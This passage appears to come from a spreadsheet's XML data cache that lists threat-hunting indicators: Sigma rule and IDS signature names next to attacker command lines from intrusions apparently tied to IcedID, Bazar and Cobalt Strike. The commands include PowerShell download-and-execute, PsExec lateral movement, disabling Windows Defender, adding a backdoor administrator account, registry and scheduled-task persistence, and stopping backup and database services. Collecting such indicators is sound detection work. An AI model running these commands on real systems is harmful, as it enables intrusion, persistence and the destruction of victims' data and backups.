    <s v="Psexec Accepteula Condition - 730fc21b-eaff-474b-ad23-90fd265d4988"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="377"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="PowerShell Scripts Installed as Services - a2e5019d-a658-4c6a-92bf-7197b54e2cae"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="378"/>
    <x v="11"/>
    <s v="sigma"/>
    <s v="LSASS Memory Dump File Creation - 5e3d3601-0662-4af0-b1d2-36a05e90c40a"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="379"/>
    <x v="3"/>
    <s v="sigma"/>
    <s v="PowerShell as a Service in Registry - 4a5f5a5e-ac01-474b-9b4e-d61298c9df1d"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="380"/>
    <x v="3"/>
    <s v="sigma"/>
    <s v="PowerShell Download from URL - 3b6ab547-8ec2-4991-b9d2-2b06702a48d7"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="381"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Non Interactive PowerShell - f4bbd493-b796-416e-bbf2-121235348529"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="382"/>
    <x v="3"/>
    <s v="sigma"/>
    <s v="PowerShell Execution - 867613fb-fa60-4497-a017-a82df74a172c"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="383"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="PowerShell Network Connections - 1f21ec3f-810d-4b0e-8045-322202e22b4b"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="384"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="rundll32.exe &quot;C:\Users\REDACTED\AppData\Local\Temp\rate_x32.dat&quot;,update /i:&quot;LaborBetray\license.dat&quot; "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="385"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="ipconfig /all"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="386"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="systeminfo"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="387"/>
    <x v="23"/>
    <s v="cmdline"/>
    <s v="whoami /groups"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="388"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net config workstation"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="389"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="390"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts  /all_trusts"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="391"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net view /all /domain"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="392"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net view /all"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="393"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="394"/>
    <x v="17"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot; : &quot;ipconfig /all&quot;, &quot;initiating_process_name&quot; : &quot;rundll32.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="395"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot; : &quot;systeminfo&quot;, &quot;initiating_process_name&quot; : &quot;rundll32.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="396"/>
    <x v="23"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot; : &quot;whoami /groups&quot;, &quot;initiating_process_name&quot; : &quot;rundll32.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="397"/>
    <x v="1"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot; : &quot;net config workstation&quot;, &quot;initiating_process_name&quot; : &quot;rundll32.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="398"/>
    <x v="17"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot; : &quot;nltest /domain_trusts&quot;, &quot;initiating_process_name&quot; : &quot;rundll32.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="399"/>
    <x v="17"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot; : &quot;nltest /domain_trusts  /all_trusts&quot;, &quot;initiating_process_name&quot; : &quot;rundll32.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="400"/>
    <x v="1"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot; : &quot;net view /all /domain&quot;, &quot;initiating_process_name&quot; : &quot;rundll32.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="401"/>
    <x v="1"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot; : &quot;net group &quot;Domain Admins&quot; /domain&quot;, &quot;initiating_process_name&quot; : &quot;rundll32.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="402"/>
    <x v="23"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot; : &quot;cmd /c whoami /groups&quot;, &quot;initiating_process_name&quot; : &quot;icjul.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="403"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot; : &quot;cmd /c query session&quot;, &quot;initiating_process_name&quot; : &quot;icjul.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="404"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot; : &quot;cmd /c dir %homedrive%homepath%&quot;, &quot;initiating_process_name&quot; : &quot;icjul.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="405"/>
    <x v="17"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot; : &quot;cmd /c nltest /dclist&quot;, &quot;initiating_process_name&quot; : &quot;icjul.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="406"/>
    <x v="17"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot; : &quot;cmd /c nltext /domain_trust&quot;, &quot;initiating_process_name&quot; : &quot;icjul.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="407"/>
    <x v="1"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot; : &quot;cmd /c net group \&quot;Enterprise Admins\&quot;  /domain&quot;, &quot;initiating_process_name&quot; : &quot;icjul.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="408"/>
    <x v="1"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot; : &quot;cmd /c net group \&quot;Domain Admins\&quot; /domain &quot;, &quot;initiating_process_name&quot; : &quot;icjul.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="409"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="cmd.exe /C dsquery subnet -limit 0"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="410"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot; : &quot;pipe&quot;, &quot;process_command_line&quot; : “C:\Windows\system32\cmd.exe /c echo 4d64fbbbf34 &gt; \\.\pipe\b4312c” , &quot;initiating_process_path&quot; : &quot;c:\windows\System32\runonce.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="411"/>
    <x v="33"/>
    <s v="cmdline"/>
    <s v="cmd.exe /C reg add &quot;hklm\system\currentControlSet\Control\Terminal Server&quot; /v &quot;fDenyTSConnections&quot; /t REG_DWORD /d 0x0 /f "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="412"/>
    <x v="4"/>
    <s v="cmdline"/>
    <s v="cmd.exe /C netsh firewall set service type = remotedesktop mode = enable"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="413"/>
    <x v="4"/>
    <s v="cmdline"/>
    <s v="cmd.exe /C netsh firewall set rule group=&quot;remote desktop&quot; new enable=Yes "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="414"/>
    <x v="4"/>
    <s v="cmdline"/>
    <s v="cmd.exe /C netsh advfirewall set rule group=&quot;remote desktop&quot; new enable=Yes "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="415"/>
    <x v="33"/>
    <s v="cmdline"/>
    <s v="cmd.exe /C copy 192145.dll \\&lt;INTERNAL_IP&gt;\ADMIN$ /Y /Z "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="416"/>
    <x v="22"/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula -d -s \\&lt;INTERNAL_IP&gt; rundll32.exe C:\windows\192145.dll,StartW "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="417"/>
    <x v="0"/>
    <s v="spawn"/>
    <s v="psexesvc.exe &gt; rundll32.exe &gt; cmd.exe"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="418"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_command_line&quot;: rundll32.exe c:\windows\192145.dll, StartW&quot;, &quot;process_command_line&quot;: &quot;cmd.exe /c echo &lt;randomstring&gt; &gt; \&quot;c:\windows\TEMP\dem238D.tmp\&quot; &amp;exit&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="419"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_command_line&quot;: &quot;C:\Windows\System32\dllhost.exe&quot;, &quot;process_command_line&quot;: &quot;C:\Windows\system32\cmd.exe /C gpupdate /force &quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="420"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_command_line&quot;: &quot;C:\Users\USER\AppData\Local\Temp\icju1.exe &quot;, &quot;process_command_line&quot;: &quot;C:\Windows\system32\cmd.exe /C gpupdate /force &quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="421"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_command_line&quot;: &quot;C:\Windows\System32\dllhost.exe  &quot;, &quot;process_command_line&quot;: &quot;C:\Windows\system32\cmd.exe /C gpupdate /force &quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="422"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_command_line&quot;: &quot;“rundll32.exe” c:\windows\192145.dll,StartW  &quot;, &quot;process_command_line&quot;: &quot;C:\Windows\system32\cmd.exe /C gpupdate /force &quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="423"/>
    <x v="2"/>
    <s v="registry"/>
    <s v="HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="424"/>
    <x v="2"/>
    <s v="registry"/>
    <s v="HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Monitoring\DisableRealtimeMonitoring "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="425"/>
    <x v="2"/>
    <s v="registry"/>
    <s v="HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Monitoring\DisableBehaviorMonitoring "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="426"/>
    <x v="2"/>
    <s v="registry"/>
    <s v="HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Monitoring\DisableIntrusionPreventionSystem "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="427"/>
    <x v="2"/>
    <s v="registry"/>
    <s v="HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="428"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net user /add /Y nuuser 7HeC00l3stP@ssw0rd"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="429"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net localgroup administrators nuuser /add"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="430"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_access&quot;, &quot;access&quot; : &quot;0x1010&quot;, &quot;file_name&quot; : &quot;lsass.exe&quot;, &quot;initiating_file_name&quot;: &quot;runonce.exe&quot;}"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="431"/>
    <x v="0"/>
    <s v="etpro"/>
    <s v="ET MALWARE Win32/IcedID Requesting Encoded Binary M4 _x000a_ET MALWARE W32/Photoloader.Downloader Request Cookie _x000a_ET POLICY PE EXE or DLL Windows file download HTTP _x000a_ET INFO Executable Retrieved With Minimal HTTP Headers – Potential Second Stage Download _x000a_ET INFO Packed Executable Download _x000a_ET POLICY OpenSSL Demo CA – Internet Widgits Pty _x000a_ATTACK [PTsecurity] Overpass the hash. Encryption downgrade activity to ARCFOUR-HMAC-MD5 _x000a_ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection _x000a_ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection _x000a_ET SCAN Behavioral Unusual Port 1434 traffic Potential Scan or Infection _x000a_ET SCAN Behavioral Unusual Port 1435 traffic Potential Scan or Infection"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="432"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Users\USER\Downloads\ResizeFormToFit.exe"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="433"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;file_create&quot;, &quot;initiating_file_path&quot;: &quot;c:\Users\user\Downloads\somthing.exe&quot;, &quot;file_path&quot;: &quot;c:\users\user\Appdata\local\temp\M1E1626.exe&quot;}"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="434"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="rundll32.exe C:\Users\USER\AppData\Local\Temp\BA6b.tmp.dll, StartW"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="435"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="cmd.exe /c reg.exe add HKCU\\Software\Microsoft\Windows\CurrentVersion\Run /f /v T4QJ4U39BI1 /t REG_SZ /d &quot; &quot;C:\Users\User\Appdata\Local\Temp\M1E1626.exe\ &quot;U3wtv&quot; $amp; start &quot;H&quot; &quot;C:\Users\user\Appdata\Local\Temp\M1E1626.exe&quot; U3WTV3"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="436"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="cmd.exe /c echo a3fed5b3a32 &gt; \\.\pipe\3406c2"/>
    <s v="The use of the Cobalt Strike’s piped privilege escalation (Get-System) was used several times during the intrusion."/>
    <x v="7"/>
  </r>
  <r>
    <x v="437"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="cmd.exe /c nltest /domain_trusts /all_trusts"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="438"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C net group &quot;enterprise admins&quot; /domain"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="439"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C net group &quot;domain admins&quot; /domain"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="440"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:35806/'); Find-LocalAdminAccess"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="441"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:35585/'); Get-NetComputer -ping -operatingsystem *server*"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="442"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:23163/'); Get-NetSubnet"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="443"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C systeminfo"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="444"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C ping HOST"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="445"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select DNSHostName, IPv4Address, OperatingSystem, LastLogonDate"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="446"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C nltest /domain_trusts /all_trusts"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="447"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C time"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="448"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C C:\Windows\Temp\adf\adf.bat"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="449"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="450"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="451"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="452"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="adfind.exe -sc trustdmp"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="453"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="454"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="455"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="456"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Users\USER\Desktop\info\7z.exe"/>
    <s v="domain controller"/>
    <x v="7"/>
  </r>
  <r>
    <x v="457"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Users\USER\Desktop\info\comps.txt"/>
    <s v="domain controller"/>
    <x v="7"/>
  </r>
  <r>
    <x v="458"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Users\USER\Desktop\info\Get-DataInfo.ps1"/>
    <s v="domain controller"/>
    <x v="7"/>
  </r>
  <r>
    <x v="459"/>
    <x v="14"/>
    <s v="file_path"/>
    <s v="C:\Users\USER\Desktop\info\netscan.exe"/>
    <s v="domain controller"/>
    <x v="7"/>
  </r>
  <r>
    <x v="460"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Users\USER\Desktop\info\start.bat"/>
    <s v="domain controller"/>
    <x v="7"/>
  </r>
  <r>
    <x v="461"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Windows\system32\cmd.exe /c &quot;&quot;C:\Users\USER\Desktop\info\start.bat&quot;&quot;"/>
    <s v="Get-DataInfo.ps1"/>
    <x v="7"/>
  </r>
  <r>
    <x v="462"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Meterpreter or Cobalt Strike Getsystem Service Start - 15619216-e993-4721-b590-4c520615a67d "/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="463"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Suspicious AdFind Execution - 75df3b17-8bcc-4565-b89b-c9898acef911"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="464"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Successful Overpass the Hash Attempt - 192a0330-c20b-4356-90b6-7b7049ae0b87"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="465"/>
    <x v="0"/>
    <s v="etpro"/>
    <s v="ET INFO Observed DNS Query for EmerDNS TLD (.bazar)_x000a_ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)_x000a_ETPRO TROJAN Observed Malicious SSL Cert (Cobalt Strike CnC)"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="466"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_name&quot;: &quot;firefox.exe&quot;, &quot;process_command_line&quot;: r''' &quot;C:\Windows\System32\schtasks.exe&quot; /CREATE /SC ONSTART /TN jf0c /TR &quot;'C:\Users\pagefilerpqy.exe'&quot; /f '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="467"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_name&quot;: &quot;firefox.exe&quot;, &quot;process_command_line&quot;: r''' &quot;C:\Windows\System32\schtasks.exe&quot; /CREATE /SC ONSTART /TN jf0c /TR &quot;'C:\Users\pagefilerpqy.exe'&quot; /f /RL HIGHEST '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="468"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_name&quot;: &quot;firefox.exe&quot;, &quot;process_command_line&quot;: r''' &quot;C:\Windows\System32\schtasks.exe&quot; /CREATE /SC ONCE /ST 17:21:58 /TN 9T6ukfi6 /TR &quot;'C:\Users\pagefilerpqy.exe'&quot; /f '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="469"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_name&quot;: &quot;firefox.exe&quot;, &quot;process_command_line&quot;: r'''&quot;C:\Windows\System32\schtasks.exe&quot; /CREATE /SC ONCE /ST 17:21:58 /TN 9T6ukfi6 /TR &quot;'C:\Users\pagefilerpqy.exe'&quot; /f /RL HIGHEST '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="470"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_name&quot;: &quot;firefox.exe&quot;, &quot;process_command_line&quot;: r''' &quot;REG ADD &quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&quot; /V \&quot;microsoft update\&quot; /t REG_SZ /F /D &quot;SCHTASKS /run /tn 9T6ukfi6&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="471"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="netlogon exploited"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="472"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net view /all "/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="473"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net view /all /domain"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="474"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="475"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net localgroup &quot;administrator&quot; "/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="476"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net group &quot;domain admins&quot; /dom"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="477"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="AdFind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="478"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="AdFind.exe -f &quot;(objectcategory=computer)&quot;"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="479"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="AdFind.exe -f &quot;(objectcategory=organizationalUnit)&quot;"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="480"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="AdFind.exe -sc trustdmp"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="481"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="AdFind.exe -subnets -f &quot;(objectCategory=subnet)&quot;"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="482"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="AdFind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="483"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="AdFind.exe -gcb -sc trustdmp"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="484"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select DNSHostName, IPv4Address, OperatingSystem, LastLogonDate"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="485"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:23163/'); Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select DNSHostName, IPv4Address, OperatingSystem, LastLogonDate"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="486"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="\\HOSTNAME\ADMIN$\ff49429.exe"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="487"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="&quot;C:\Windows\system32\net1 stop &quot;&quot;samss&quot;&quot; /y&quot;"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="488"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="&quot;C:\Windows\system32\net1 stop &quot;&quot;veeamcatalogsvc&quot;&quot; /y&quot;"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="489"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="&quot;C:\Windows\system32\net1 stop &quot;&quot;veeamcloudsvc&quot;&quot; /y&quot;"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="490"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="&quot;C:\Windows\system32\net1 stop &quot;&quot;veeamdeploysvc&quot;&quot; /y&quot;"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="491"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM sqlbrowser.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM sqlceip.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM sqlservr.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM sqlwriter.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM veeam.backup.agent.configurationservice.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM veeam.backup.brokerservice.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM veeam.backup.catalogdataservice.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM veeam.backup.cloudservice.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM veeam.backup.externalinfrastructure.dbprovider.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM veeam.backup.manager.exe /F&quot;_x000a_&quot;C:\Windows\System32\taskkill.exe&quot;&quot; /IM 